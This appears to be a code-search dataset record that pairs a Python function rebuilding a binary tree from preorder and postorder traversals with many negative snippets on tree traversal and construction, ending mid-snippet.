def constructFromPrePost(self, pre, post): if not pre and not post: return None root = TreeNode(pre[0]) if len(pre) == 1 and len(post) == 1: return root if pre[1] == post[-2]: lpre, lpost = pre[1:], post[:len(post)-1] ltree = self.constructFromPrePost(lpre, lpost) root.left = ltree else: lpre = pre[1:pre.index(post[-2])] lpost = post[:post.index(pre[1]) + 1] rpre = pre[pre.index(post[-2]):] rpost = post[post.index(pre[1])+1:-1] ltree = self.constructFromPrePost(lpre, lpost) rtree = self.constructFromPrePost(rpre, rpost) root.left, root.right = ltree, rtree return root
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def buildTree(self, inorder: 'List[int]', postorder: 'List[int]') -> 'TreeNode':\n self.post_index = len(postorder) - 1\n dict = {}\n for i, num in enumerate(inorder):\n dict[num] = i\n \n def helper(in_left, in_right):\n if in_left > in_right:\n return None\n \n root_val = postorder[self.post_index]\n root = TreeNode(root_val)\n self.post_index -= 1\n if in_left < in_right:\n root.right = helper(dict[root_val] + 1, in_right)\n root.left = helper(in_left, dict[root_val] - 1)\n return root\n \n return helper(0, len(inorder) - 1)", "def build_tree(preorder, inorder):\n\n # Base case\n if preorder == [] or inorder == []:\n return\n\n root = preorder[0]\n\n # Breaks the lists by root, left side, and right side\n in_index = inorder.index(root)\n in_left = inorder[:in_index]\n in_right = inorder[in_index + 1:]\n pre_left = preorder[1 : len(in_left) + 1]\n pre_right = preorder[len(in_left) + 1 :]\n\n # Recursively creates smaller binary trees to make a big binary tree\n tree = BinaryTree(root)\n tree.set_left(build_tree(pre_left, in_left))\n tree.set_right(build_tree(pre_right, in_right))\n\n return tree", "def construct_binary_tree(preorder, inorder):\n if len(preorder) == 0 or preorder == None or inorder == None:\n return None\n\n val = preorder[0]\n root = BinaryTreeNode(val)\n\n if len(preorder) > 1:\n inorder_root_index = inorder.index(val)\n inorder_left_sub_tree = inorder[:inorder_root_index]\n inorder_right_sub_tree = inorder[inorder_root_index+1:]\n preorder_left_sub_tree = preorder[1:len(inorder_left_sub_tree)+1]\n preorder_right_sub_tree = preorder[len(inorder_left_sub_tree) + 1:]\n root.left = construct_binary_tree(preorder_left_sub_tree, inorder_left_sub_tree)\n root.right = construct_binary_tree(preorder_right_sub_tree, inorder_right_sub_tree)\n return root", "def test_bin_tree():\n n1 = BinTreeNode(1)\n n2 = BinTreeNode(2)\n n3 = BinTreeNode(3)\n n4 = BinTreeNode(4)\n n5 = BinTreeNode(5)\n n1.left = n2\n n1.right = n3\n n2.left = n4\n n3.right = n5\n t = BinTree(n1)\n print('pre order')\n preorder_trav(t.root)\n print('in order')\n inorder_trav(t.root)\n print('post order')\n postorder_trav(t.root)", "def Trees_preOrder_traversal():\n # Python2 ported to Python3 via 2to3-3.7\n # URL:https://www.hackerrank.com/challenges/tree-preorder-traversal/problem\n def preOrder(root):\n # inorder: left root right\n # preorder: root, left, right 5,3,1,4,7,6,8\n # postorder: left,right, root\n # 5\n # 3 7\n # 1 4 6 8\n out = []\n to_proccess = [root]\n while to_proccess:\n node = to_proccess.pop()\n out.append(node.info)\n for child in [node.right, node.left]:\n if child:\n to_proccess.append(child)\n print(\" \".join(map(str, out)))\n\n def preOrder_recursive(root):\n def _preOrder(node):\n out = []\n out.append(node.info)\n for child in [node.left, node.right]:\n if child:\n out.extend(_preOrder(child))\n return out\n print(\" \".join(map(str, _preOrder(root))))", "def postorderTraversal(self, root: TreeNode) -> List[int]:\n stack = []\n postorder = []\n stack.append(root)\n\n while stack:\n node = stack.pop()\n if not node: continue\n right = node.right\n left = node.left\n if not right and not left:\n postorder.append(node.val)\n else:\n node.left = None\n node.right = None\n stack.append(node)\n stack.append(right)\n stack.append(left)\n return postorder", "def postorder_traversal(tree):\n post = '' # Handles the spaces between the postorder traversal\n # in the string\n\n # To make sure the function doesn't move on if it doesn't have\n # a left child, so it doesn't add to string if it is None\n if tree.get_left() != None:\n post += postorder_traversal(tree.get_left()) + ' '\n\n # To make sure the function doesn't move on if it doesn't have\n # a right child, so it doesn't add to string if it is None\n if tree.get_right() != None:\n post += postorder_traversal(tree.get_right()) + ' '\n\n # Prints the current value (this is all recursed in postorder)\n post += str(tree.get_val())\n\n return post", "def build_tree_from_preorder(values): \r\n \r\n if len(values) == 0 or values[0] == None:\r\n return None\r\n root = TreeNode(values[0])\r\n if len(values) == 1:\r\n return root\r\n root.left = build_tree_from_preorder(values[1:((len(values)-1) // 2 + 1)])\r\n root.right = build_tree_from_preorder(values[((len(values)-1) // 2 + 1):]) \r\n if root.left != None:\r\n root.left.parent = root\r\n if root.right != None:\r\n root.right.parent = root\r\n \r\n return root", "def compute_pre_post_order_values(\n tree,\n parent_id=None,\n parent_preorder=1,\n):\n # if we don't get a parent_id, we infer it to be the top level node\n parent_id = parent_id or next(iter(tree))\n\n pre_post_parent = {\n parent_id: {\n \"preorder\": parent_preorder,\n }\n }\n\n child_postorder = None\n # sorted to make result deterministic\n children_ids = sorted(tree[parent_id].keys())\n for child_id in children_ids:\n # if child_postorder is set we know this is not the first child and can set preorder relative to previous child\n child_preorder = child_postorder + 1 if child_postorder else parent_preorder + 1\n\n pre_post_child = compute_pre_post_order_values(\n tree[parent_id],\n child_id, \n child_preorder)\n pre_post_parent.update(pre_post_child)\n child_postorder = pre_post_child[child_id][\"postorder\"]\n # if children, parent post order is one more than last child post order; if leafnode, then postorder is one more than preorder\n pre_post_parent[parent_id][\"postorder\"] = pre_post_child[child_id][\"postorder\"] + 1 if children_ids else parent_preorder + 1\n\n return pre_post_parent", "def postorder_iteratively(tree):\n visited = []\n path = [tree]\n result = []\n while len(path) > 0:\n t = path[-1]\n if t not in visited:\n if t.right:\n path = path + [t.right]\n if t.left:\n path = path + [t.left]\n visited.append(t)\n else:\n path.pop()\n result.append(t.data)\n\n return result", "def postorder(root):\n if not root:\n print(\"Tree is Empty.\")\n return\n stack = []\n node = root\n visited = set()\n while stack or node:\n if node:\n stack.append(node)\n node = node.left\n\n else:\n node = stack.pop()\n if node.right and not (node.right in visited):\n stack.append(node)\n node = node.right\n else:\n visited.add(node)\n print(node.data, end=\" \")\n node = None\n print()", "def postorder(root):\n if not root:\n return\n inorder(root.left)\n inorder(root.right)\n print(root.data, end=' ')", "def post_order_nodes(root):\n if root.get_left():\n for node in post_order_nodes(root.get_left()):\n yield node\n\n if root.get_right():\n for node in post_order_nodes(root.get_right()):\n yield node\n\n yield root", "def reconstruct_preorder(preorder):\n\tdef reconstruct_preorder_helper(preorder_iter):\n\t\tsubtree_key = next(preorder_iter, None)\n\t\tif subtree_key is None:\n\t\t\treturn None\n\t\treturn BinaryTreeNode(\n\t\t\tsubtree_key,\n\t\t\treconstruct_preorder_helper(preorder_iter),\n\t\t\treconstruct_preorder_helper(preorder_iter))\n\treturn reconstruct_preorder_helper(iter(preorder))", "def postorder_iterative(root):\n if root is None:\n return\n \n stack1 = []\n stack2 = []\n stack1.append(root)\n \n while len(stack1):\n node = stack1.pop()\n stack2.append(node)\n \n if node.left:\n stack1.append(node.left)\n if node.right:\n stack1.append(node.right)\n \n while len(stack2):\n node = stack2.pop()\n print(node.data, end=\" \")", "def post_order(self):\n def walk(root):\n\n if root.left:\n walk(root.left)\n\n if root.right:\n walk(root.right)\n\n self.post_values.append(root.value)\n \n walk(self.root)\n return self.post_values", "def postorder(root: Node):\n return postorder(root.left) + postorder(root.right) + [root.data] if root else []", "def test_post_order_0_2(bst_all_to_left):\n assert tuple(bst_all_to_left.post_order()) == (1, 3, 2, 5, 4)", "def pre_order(self):\n def walk(root):\n self.pre_values.append(root.value)\n\n if root.left:\n walk(root.left)\n \n if root.right:\n walk(root.right)\n \n walk(self.root)\n return self.pre_values", "def postorder(self):\n\n traversal = []\n self.postorder_helper(self.root, traversal)\n return traversal", "def test_post_order_traversal(our_bsts):\n bpost = []\n for i in our_bsts[0].post_order():\n bpost.append(i)\n assert bpost == our_bsts[6]", "def binary_search_tree_run():\n\n # no need for Tree object as the Tree itself is a concept; its made of connected nodes\n # nodes are the object; connections are self contained\n\n def binary_insert(root, node):\n if root is None:\n root = node\n else:\n if root.data > node.data:\n if root.l_child is None:\n root.l_child = node\n else:\n binary_insert(root.l_child, node)\n else:\n if root.r_child is None:\n root.r_child = node\n else:\n binary_insert(root.r_child, node)\n\n def in_order_print(root):\n if not root:\n return\n in_order_print(root.l_child)\n print(root.data)\n in_order_print(root.r_child)", "def create_BinaryTree(inor, preor, inStart, inEnd):\n if inStart > inEnd:\n return\n temp = BinaryTreeNode(preor[create_BinaryTree.index])\n create_BinaryTree.index += 1\n\n if inStart == inEnd:\n return temp\n\n for i in range(inStart, inEnd + 1):\n if inor[i] == temp.data:\n index = i\n\n temp.left = create_BinaryTree(inor, preor, inStart, index - 1)\n temp.right = create_BinaryTree(inor, preor, index + 1, inEnd)\n return temp", "def preorder(root: Node):\n return [root.data] + preorder(root.left) + preorder(root.right) if root else []", "def branches(tree):\n return tree[1:]", "def generate_tree_postorder(node_lst, root_index):", "def post_order(self):\n try:\n if not self.root:\n return \"the tree is empty!\"\n else:\n output = []\n\n def order_tree(node):\n if node.left:\n order_tree(node.left)\n if node.right:\n order_tree(node.right)\n nonlocal output\n output += [node.value]\n return output\n final_out = order_tree(self.root)\n return final_out\n except:\n print(\"something went wrong please try again\")", "def branches(tree):\n\n return tree[1:]", "def preorder(node, pred, succ, res):\n if node is None:\n return res\n res = min(res, node.val - pred)\n res = min(res, succ - node.val)\n res = preorder(node.left, pred, node.val, res)\n res = preorder(node.right, node.val, succ, res)\n return res", "def preorder(root):\n if not root:\n return\n print(root.data, end=' ')\n inorder(root.left)\n inorder(root.right)", "def _post_order_helper(node_lst: List[ReadNode],\n root_index: int, flag: bool = True,\n right_index: int = 0) -> HuffmanTree:\n # if internal node\n if node_lst[root_index].l_type == 1 and flag:\n\n # Making Tree\n tree = HuffmanTree(None)\n\n tree.number = root_index - 1 - right_index\n\n # Creating Left and Right Trees\n tree.right = _post_order_helper(node_lst, tree.number, False)\n\n right_index = _find_height(tree.right)\n\n if right_index is None:\n right_index = 0\n else:\n right_index = len(right_index)\n\n tree.left = _post_order_helper(\n node_lst, tree.number, True, right_index)\n\n return tree\n\n elif node_lst[root_index].r_type == 1 and not flag:\n # Making Tree\n tree = HuffmanTree(None)\n tree.number = root_index - 1\n\n # Creating Left and Right Trees\n tree.right = _post_order_helper(node_lst, tree.number, False)\n\n right_index = _find_height(tree.right)\n\n if right_index is None:\n right_index = 0\n else:\n right_index = len(right_index)\n\n tree.left = _post_order_helper(\n node_lst, tree.number, True, right_index)\n\n return tree\n\n elif node_lst[root_index].l_type == 0 and flag:\n return HuffmanTree(node_lst[root_index].l_data)\n\n elif node_lst[root_index].r_type == 0 and not flag:\n return HuffmanTree(node_lst[root_index].r_data)\n\n return HuffmanTree(None)", "def postorder(self):\n return (node for node in self.get_postorder(self.root))", "def _minlex_postorder_traversal(self, root):\n\n # We compute a dictionary mapping from internal node ID to min leaf ID\n # under the node, using a first postorder traversal\n min_leaf = {}\n for u in self.nodes(root, order=\"postorder\"):\n if self.is_leaf(u):\n min_leaf[u] = u\n else:\n min_leaf[u] = min(min_leaf[v] for v in self.children(u))\n\n stack = []\n\n def push(nodes):\n stack.extend(sorted(nodes, key=lambda u: min_leaf[u], reverse=True))\n\n # The postorder traversal isn't robust to using virtual_root directly\n # as a node because we depend on tree.parent() returning the last\n # node we visiting on the path from \"root\". So, we treat this as a\n # special case.\n is_virtual_root = root == self.virtual_root\n roots = self.roots if root == -1 or is_virtual_root else [root]\n\n push(roots)\n parent = NULL\n while len(stack) > 0:\n v = stack[-1]\n children = [] if v == parent else self.children(v)\n if len(children) > 0:\n # The first time visiting a node, we push onto the stack its children\n # in order of reverse min leaf ID under each child. This guarantees\n # that the earlier children visited have smaller min leaf ID,\n # which is equivalent to the minlex condition.\n push(children)\n else:\n # The second time visiting a node, we pop and yield it, and\n # we update the parent variable\n parent = self.get_parent(v)\n yield stack.pop()\n if is_virtual_root:\n yield self.virtual_root", "def post_order_traversal(self) -> Queue:\n # initialize Queue\n q = Queue()\n\n #BST == empty\n if self.root is None:\n return q\n\n #recursive helper function return new Queue\n self.post_order_helper(self.root, q)\n return q", "def post_order(self):\n if self.left is not None:\n for i in self.left.post_order():\n yield i\n if self.right is not None:\n for i in self.right.post_order():\n yield i\n if self.val is not None:\n yield self.val", "def deserialize(self, data):\n post_order = [int(each) for each in data.split(' ') if data]\n print(post_order)\n\n def helper(lower=float('-inf'), upper=float('inf')):\n if not post_order or post_order[-1] < lower or post_order[-1] > upper:\n return None\n val = post_order.pop()\n root = TreeNode(val)\n root.right = helper(val, upper)\n root.left = helper(lower, val)\n\n return root\n\n r = helper()\n return r", "def post_order_traversal(self) -> Queue:\n q = Queue() # Initializing queue\n if self.root is None: # If tree is empty\n return q\n\n self.post_order_helper(self.root, q) # Using helper function if tree isn't empty and returning Queue\n return q", "def postorder_helper(succ, root, explored, out):\n if root in explored:\n return\n explored.add(root)\n\n for s in succ[root]:\n postorder_helper(succ, s, explored, out)\n out.append(root)", "def test_pre_order_0_2(bst_all_to_left):\n assert tuple(bst_all_to_left.pre_order()) == (4, 2, 1, 3, 5)", "def traverse_postorder(self, root):\n if root is not None:\n self.traverse_postorder(root.left)\n self.traverse_postorder(root.right)\n print(root.data)", "def postorder_traverse(self):\n\n keys = []\n\n if not self.node:\n return keys\n \n keys.extend(self.node.left.postorder_traverse())\n keys.extend(self.node.right.postorder_traverse())\n keys.append(self.node.vp.index)\n\n return keys", "def pre_order_nodes(root):\n yield root\n\n if root.get_left():\n for node in pre_order_nodes(root.get_left()):\n yield node\n\n if root.get_right():\n for node in pre_order_nodes(root.get_right()):\n yield node", "def postorder_recursive(node):\n if node is None:\n return\n \n postorder_recursive(node.left)\n postorder_recursive(node.right)\n print(node.data, end=\" \")", "def test_pre_order_traversal(our_bsts):\n bpo = []\n for i in our_bsts[0].pre_order():\n bpo.append(i)\n assert bpo == our_bsts[4]", "def post_order_traversal(self, root):\n\n def postorder_traversal_helper(root):\n if root:\n postorder_traversal_helper(root.left)\n postorder_traversal_helper(root.right)\n result.append(root.data)\n\n result = []\n postorder_traversal_helper(root)\n return result", "def preorder(self):\n\n traversal = []\n self.preorder_helper(self.root, traversal)\n return traversal", "def postorder(self,root)->list:\n\t\tres=[]\n\t\tif root:\n\t\t\tres=self.postorder(root.left)\n\t\t\tres=res+self.postorder(root.right)\n\t\t\tres.append(root.data)\n\t\treturn res", "def post_tree(user, root):\n\n # Get all posts that belong to post root.\n query = Post.objects.valid_posts(u=user, root=root).exclude(pk=root.id)\n\n # Filter spam/deleted comments or answers.\n if user.is_anonymous or not user.profile.is_moderator:\n query = query.exclude(Q(status=Post.DELETED) | Q(spam=Post.SPAM))\n\n query = query.select_related(\"lastedit_user__profile\", \"author__profile\", \"root__author__profile\")\n\n # Apply the sort order to all posts in thread.\n thread = query.order_by(\"type\", \"-accept_count\", \"-vote_count\", \"creation_date\")\n\n # Gather votes by the current user.\n votes = get_votes(user=user, root=root)\n\n # Shortcuts to each storage.\n bookmarks, upvotes = votes[Vote.BOOKMARK], votes[Vote.UP]\n\n # Build comments tree.\n comment_tree = dict()\n\n def decorate(post):\n # Mutates the elements! Not worth creating copies.\n if post.is_comment:\n comment_tree.setdefault(post.parent_id, []).append(post)\n post.has_bookmark = int(post.id in bookmarks)\n post.has_upvote = int(post.id in upvotes)\n if user.is_authenticated:\n post.can_accept = not post.is_toplevel and (user == post.root.author or user.profile.is_moderator)\n post.can_moderate = user.profile.is_moderator\n post.is_editable = (user == post.author or user.profile.is_moderator)\n else:\n post.can_accept = False\n post.is_editable = False\n post.can_moderate = False\n\n return post\n\n # Decorate the objects for easier access\n thread = list(map(decorate, thread))\n\n # Decorate the root post\n root = decorate(root)\n\n # Select the answers from the thread.\n answers = [p for p in thread if p.type == Post.ANSWER]\n\n return root, comment_tree, answers, thread", "def recoverTree(self, root: TreeNode) -> None:\n firstNode = None\n secondNode = None\n pre = TreeNode(float(\"-inf\"))\n\n stack = []\n p = root\n while p or stack:\n while p:\n stack.append(p)\n p = p.left\n p = stack.pop()\n\n if not firstNode and pre.val > p.val:\n firstNode = pre\n if firstNode and pre.val > p.val:\n # print(firstNode.val,pre.val, p.val)\n secondNode = p\n pre = p\n p = p.right\n firstNode.val, secondNode.val = secondNode.val, firstNode.val", "def pre_order_traversal(self):\n\n elements = []\n\n ##visit base node\n elements.append(self.data)\n\n ##visit left tree\n if self.left:\n elements += self.left.pre_order_traversal()\n\n #visit right tree\n if self.right:\n elements += self.right.pre_order_traversal()\n\n return elements", "def generate_tree_postorder(node_lst: List[ReadNode],\n root_index: int) -> HuffmanTree:\n\n tree = HuffmanTree(None)\n tree.right = _post_order_helper(node_lst, root_index, False)\n\n right_index = _find_height(tree.right)\n\n if right_index is None:\n right_index = 0\n else:\n right_index = len(right_index)\n\n tree.left = _post_order_helper(node_lst, root_index, True, right_index)\n\n _post_order_set_none(tree)\n\n return tree", "def test_binarytree_post_order_on_given(given_list, capsys):\n expected = [11, 14, 12, 19, 18, 22, 33, 31, 40, 20]\n given_list.post_order()\n out, err = capsys.readouterr()\n actual = [int(i) for i in out.split('\\n') if i != '']\n assert expected == actual", "def in_order_recursive(tree, vertex, keys):\n if vertex == -1:\n return True\n result = in_order_recursive(tree, tree[vertex][1], keys)\n # If the previous result is False, then the check is completed.\n # If the value of the last key in the list is greater than the current one,\n # then it is not bst, return False.\n # If the vertex has a left child and the key values ​​are equal,\n # then it is also not bst, return False.\n if not result or (keys and (keys[-1] > tree[vertex][0])) or (\n tree[vertex][1] != -1 and tree[tree[vertex][1]][0] == tree[vertex][0]\n ):\n return False\n keys.append(tree[vertex][0])\n result = in_order_recursive(tree, tree[vertex][2], keys)\n return result", "def preorder(self):\n return (node for node in self.get_preorder(self.root))", "def get_predeccessor(self, root):\n # Take a right traversal and go left\n # As much as you can. Last node will be successor\n root = root.left\n while root.right:\n root = root.right\n return root", "def fetchNodes(tree):\n if tree.results is None: #Check if the node is a branch\n condItems = {} #Initialize a container for the node conditions from lower branches\n v = [\"true\", \"false\"] #\"Veracity values\"\n for branch, veracity in [(tree.tb, v[0]), (tree.fb, v[1])]: #iterate over this node's true and false child nodes\n lower_results = fetchNodes(branch)\n if len(lower_results) == 1: #Check if child node is actually a leaf. If so,\n lower_results.insert(0, (tree.col, tree.value, veracity))\n condItems[veracity] = [lower_results] #Initialize the condition needed to reach that leaf\n else:\n condItems[veracity] = [] #If the child is not a leaf, initialize an empty list to contain its updated conditions\n for item in lower_results: #Iterate over each set of node conditions that stem from this branch\n new_descriptor = deepcopy(item) #make a deep copy of the list of node conditions from the lower level nodes\n #insert this node's condition at the beginning of each of the node conditions from the lower levels\n new_descriptor.insert(0, (tree.col, tree.value, veracity)) \n condItems[veracity].append(new_descriptor) #append the updated set of node conditions to the branches items\n node_conditions = deepcopy(condItems[v[0]]) #Initialize the complete list of node conditions that stem from this node\n node_conditions.extend(deepcopy(condItems[v[1]])) #Add the node conditions from the second branch of this node\n return node_conditions #Send the full set of node conditions from this node up to the higher nodes.\n else: #If the node is a leaf, return the dictionary of results\n return [tree.results]", "def postorder_recursive(root):\n if root:\n postorder_recursive(root.left)\n postorder_recursive(root.right)\n print(root.data, end=\" \")", "def post_order(self):\n stack = []\n node = self\n last = None\n while stack or node:\n if node:\n stack.append(node)\n node = node.left\n else:\n peek = stack[-1]\n if peek.right is not None and last != peek.right:\n node = peek.right\n else:\n yield peek.val\n last = stack.pop()\n node = None", "def walk_tree(tree,\n leaf_func=lambda x: None,\n pre_nonleaf_func=lambda x: None,\n post_nonleaf_func=lambda x: None):\n tree = deepcopy(tree)\n\n def walk(node):\n # Depth First Traversal of an NLTK Tree.\n if is_leaf_node(node):\n leaf_func(node)\n else:\n pre_nonleaf_func(node)\n if len(node) > 0:\n for child in node:\n walk(child)\n post_nonleaf_func(node)\n\n walk(tree)\n return tree", "def pre_order_traversal(self) -> Queue:\n # initialize\n q = Queue()\n\n #binary search tree == empty\n if self.root is None:\n return q\n\n #recursive helper return Queue\n self.pre_order_helper(self.root, q)\n return q", "def preorderTraversal(self, root: TreeNode) -> List[int]:\n def preorder(root,seq):\n if root is None:\n return seq\n seq.append(root.val)\n preorder(root.left,seq)\n preorder(root.right,seq)\n return seq\n \n prelist= []\n return preorder(root,prelist)", "def binarizetree(tree):\n queue = [tree]\n while queue:\n node = queue.pop(0)\n queue += node.nodelist\n # Construct binary tree\n if len(node.nodelist) == 2:\n node.lnode = node.nodelist[0]\n node.rnode = node.nodelist[1]\n # Parent node\n node.lnode.pnode = node\n node.rnode.pnode = node\n elif len(node.nodelist) > 2:\n # Remove one node from the nodelist\n node.lnode = node.nodelist.pop(0)\n newnode = SpanNode(node.nodelist[0].prop)\n newnode.nodelist += node.nodelist\n # Right-branching\n node.rnode = newnode\n # Parent node\n node.lnode.pnode = node\n node.rnode.pnode = node\n # Add to the head of the queue\n # So the code will keep branching\n # until the nodelist size is 2\n queue.insert(0, newnode)\n # Clear nodelist for the current node\n node.nodelist = []\n return tree", "def postorder(self):\n if not self.is_empty():\n for p in self._subtree_postorder(self.root()): # start recursion\n yield p", "def preorder(root):\n if not root:\n print(\"Tree is Empty\")\n return\n stack = []\n stack.append(root)\n while stack:\n node = stack.pop()\n print(node.data, end=\" \")\n if node.right:\n stack.append(node.right)\n if node.left:\n stack.append(node.left)\n print()", "def question4(T,r,n1,n2):\n\n\tif(len(T)<=1):\t\t\t\t\t\t\t\t# Edge case : If the Tree only consists of a root and no children\n\t\treturn -1\n\n\tif(n1==None or n2==None):\t\t\t\t\t# Edge case : If n1 and n2 are not actually numbers\n\t\treturn -1\n\n\tlen_T = len(T)\n\tif(not n1 < len_T or not n2 < len_T):\t\t# Edge case : If the nodes gives in parameters do not actually exist in the tree\n\t\treturn -1\n\n\tn1_list = []\t\t\t\t\t\t\n\tn2_list = []\n\n\tfor i in range(len(T)):\t\t\t\t\t\t# Traverse the list and append all the parents of node1 if found in O(N)\n\t\tif T[i][n1]==1:\n\t\t\tn1_list.append(i)\n\n\tfor i in range(len(T)):\t\t\t\t\t\t# Traverse the list and append all the parents of node2 is found in O(N)\n\t\tif T[i][n2]:\n\t\t\tn2_list.append(i)\n\n\t\t\t\t\t\t\t\t\t\t\t\t# The root is a common ancestor of every node in the tree\n\tif not r in n1_list:\t\t\t\t\t\t# check if the root is in the list, if not, add it\n\t\tn1_list.append(r)\n\n\tif not r in n2_list:\t\t\t\t\t\t# check if the root is in the list, if not, add it\n\t\tn2_list.append(r)\n\n\tn1_list = reversed(n1_list)\t\t\t\t\t# Since we are operating on a binary tree, we sort\n\tfor i in n1_list:\t\t\t\t\t\t\t# in decending order to operate on the latest nodes\n\t\tif i in n2_list:\t\t\t\t\t\t# if a match is found, we know that it is the lowest common ancestor\n\t\t\treturn i \t\t\t\t\t\t\t# If nothing is found, the root node is bound to be returned. And it correct.", "def _traverse_post_order(tree: HuffmanTree, byte_list: List[int] = None) \\\n -> List:\n if not tree.is_leaf():\n if byte_list is None:\n byte_list = []\n\n byte_list = _traverse_post_order(tree.left, byte_list)\n byte_list = _traverse_post_order(tree.right, byte_list)\n\n if not tree.left.is_leaf():\n byte_list.append(1)\n byte_list.append(tree.left.number)\n\n if tree.left.is_leaf():\n byte_list.append(0)\n byte_list.append(tree.left.symbol)\n\n if not tree.right.is_leaf():\n byte_list.append(1)\n byte_list.append(tree.right.number)\n\n if tree.right.is_leaf():\n byte_list.append(0)\n byte_list.append(tree.right.symbol)\n\n return byte_list", "def traverse_postorder(operation):\n\n nodes_postorder = []\n def recurse(node):\n if isinstance(node, Operation):\n for input_node in node.input_nodes:\n recurse(input_node)\n nodes_postorder.append(node)\n\n recurse(operation)\n return nodes_postorder", "def pre_order(self):\n stack = []\n node = self\n while stack or node:\n if node:\n yield node.val\n stack.append(node)\n node = node.left\n else:\n node = stack.pop()\n node = node.right", "def tree_BST(tree): \r\n if(tree==None):\r\n return True\r\n elif (left(tree)!=None):\r\n if(value(left(tree))>value(tree)):\r\n return False\r\n elif (right(tree)!=None):\r\n if(value(right(tree))<value(tree)):\r\n return False\r\n return tree_BST(left(tree))\r\n return tree_BST(right(tree))", "def traverse_postorder(operation):\n\n nodes_postorder = []\n def recurse(node):\n if isinstance(node, Operation):\n for input_node in node.input_nodes:\n recurse(input_node)\n nodes_postorder.append(node)\n\n recurse(operation)\n return nodes_postorder", "def dfs_ex(self, depth: Optional[int] = None,\n reverse: bool = False, mirror: bool = False, post_order: bool = False) \\\n -> Iterable[Tuple['Tree', int, Tuple[int, ...]]]:\n assert not (reverse and post_order), 'Param `post_order` incompatible with param `reverse`'\n if reverse:\n if mirror:\n return non_recursive_tree_dfs_reverse_mirror_ex(self, depth)\n else:\n return non_recursive_tree_dfs_reverse_original_ex(self, depth)\n elif post_order:\n if mirror:\n return non_recursive_tree_dfs_reverse_original_ex(self, depth)\n else:\n return non_recursive_tree_dfs_reverse_mirror_ex(self, depth)\n else:\n if mirror:\n return non_recursive_tree_dfs_forward_mirror_ex(self, depth)\n else:\n return non_recursive_tree_dfs_forward_original_ex(self, depth)", "def preorder(self,root)->list:\n\t\tres=[]\n\t\tif root:\n\t\t\tres.append(root.data)\n\t\t\tres=res+self.preorder(root.left)\n\t\t\tres=res+self.preorder(root.right)\n\t\treturn res", "def post_order_search_stack(self, root):\n if root is None:\n return\n myStack1 = []\n myStack2 = []\n node = root\n myStack1.append(node)\n while myStack1: # 这个while循环的功能是找出后序遍历的逆序,存在myStack2里面\n node = myStack1.pop()\n if node.lchild:\n myStack1.append(node.lchild)\n if node.rchild:\n myStack1.append(node.rchild)\n myStack2.append(node)\n while myStack2: # 将myStack2中的元素出栈,即为后序遍历次序\n pass\n # print(myStack2.pop().elem)", "def expression_tree(postfix:str) -> Node:\n stack = deque()\n for ch in postfix:\n if ch not in {'+', '-', '*', '/', '^'}:\n stack.append(Node(ch))\n else:\n middle_node = Node(ch)\n right_node = stack.pop()\n left_node = stack.pop()\n middle_node ._right = right_node\n middle_node._left = left_node\n stack.append(middle_node)\n return stack.pop()", "def recoverTree(self, root: TreeNode) -> None:\n self.firstNode = None\n self.secondNode = None\n self.preNode = TreeNode(float(\"-inf\"))\n\n def in_order(root):\n if not root:\n return\n in_order(root.left)\n if self.firstNode == None and self.preNode.val >= root.val:\n self.firstNode = self.preNode\n if self.firstNode and self.preNode.val >= root.val:\n self.secondNode = root\n self.preNode = root\n in_order(root.right)\n\n in_order(root)\n self.firstNode.val, self.secondNode.val = self.secondNode.val, self.firstNode.val", "def in_order(self):\n def walk(root):\n\n if root.left:\n walk(root.left)\n\n self.in_values.append(root.value)\n\n if root.right:\n walk(root.right)\n \n walk(self.root)\n return self.in_values", "def test_right_rotation_three_node_tree_including_root():\n from bbst import Bst\n tree = Bst([5, 4, 3])\n assert tuple(tree.in_order()) == (3, 4, 5)\n assert tuple(tree.breadth_first()) == (4, 3, 5)\n assert tuple(tree.pre_order()) == (4, 3, 5)\n assert tuple(tree.post_order()) == (3, 5, 4)\n assert tree.depth() == 2\n assert tree.balance() == 0", "def preorder(head):\r\n if head == None:\r\n return\r\n preorder(head.left) #recursive call to left\r\n preorder(head.right) #recursive call to right\r", "def test_postorder_traversal(depth_one_tree):\n testlist = []\n depth_one_tree.post_order(lambda x: testlist.append(x))\n assert str(testlist) == str([1, 2, 3, 4, 0])", "def preorder_recursive(root):\n if root:\n print(root.data, end=\" \")\n preorder_recursive(root.left)\n preorder_recursive(root.right)", "def inorder_traversal(root, inorder):\r\n if root is None:\r\n return\r\n\r\n inorder_traversal(root.left, inorder)\r\n inorder.append(root.val)\r\n inorder_traversal(root.right, inorder)\r\n return inorder", "def in_order_nodes(root):\n if root.get_left():\n for node in in_order_nodes(root.get_left()):\n yield node\n\n yield root\n\n if root.get_right():\n for node in in_order_nodes(root.get_right()):\n yield node", "def RecursiveTraversal(self, root: TreeNode, strategy: str) -> List[int]:\n\n result = []\n if (root):\n if strategy == 'POST':\n if (root.left is not None):\n result = result + self.RecursiveTraversal(root.left,strategy)\n if (root.right is not None):\n result = result + self.RecursiveTraversal(root.right,strategy)\n result.append(root.val)\n elif strategy == 'PRE':\n result.append(root.val)\n if (root.left is not None):\n result = result + self.RecursiveTraversal(root.left,strategy)\n if (root.right is not None):\n result = result + self.RecursiveTraversal(root.right,strategy)\n elif strategy == 'IN':\n if (root.left is not None):\n result = result + self.RecursiveTraversal(root.left,strategy)\n result.append(root.val)\n if (root.right is not None):\n result = result + self.RecursiveTraversal(root.right,strategy)\n return result", "def postorderUtil(self, root):\n if root:\n self.postorderUtil(root.left)\n self.postorderUtil(root.right)\n self.postlist.append(root.key)\n return self.postlist", "def test_binarytree_post_order_exists():\n assert BinaryTree.post_order", "def postorder(self,node):\n if node is not None:\n self.postorder(node.left)\n self.postorder(node.right)\n print node.value,", "def inorder_no_recursion(self):\n\n traversal, stack = [], []\n stack.append(self.root)\n\n while stack:\n node = stack.pop()\n if node.right and not node.right.visited:\n stack.append(node.right)\n node.right.visited = True\n if not node.left or node.left.visited:\n # Only append if left side empty or visited\n traversal.append(node.data)\n node.visited = True\n elif node.left:\n stack.extend([node, node.left])\n\n return traversal", "def binary_tree_level_order(node: Node) -> None:\r\n\r\n queue = [node]\r\n while len(queue):\r\n node = queue.pop(0)\r\n yield node.value\r\n if node.left is not None:\r\n queue.append(node.left)\r\n if node.right is not None:\r\n queue.append(node.right)", "def nodes(self, root=None, order=\"preorder\"):\n methods = {\n \"preorder\": self._preorder_traversal,\n \"inorder\": self._inorder_traversal,\n \"postorder\": self._postorder_traversal,\n \"levelorder\": self._levelorder_traversal,\n \"breadthfirst\": self._levelorder_traversal,\n \"timeasc\": 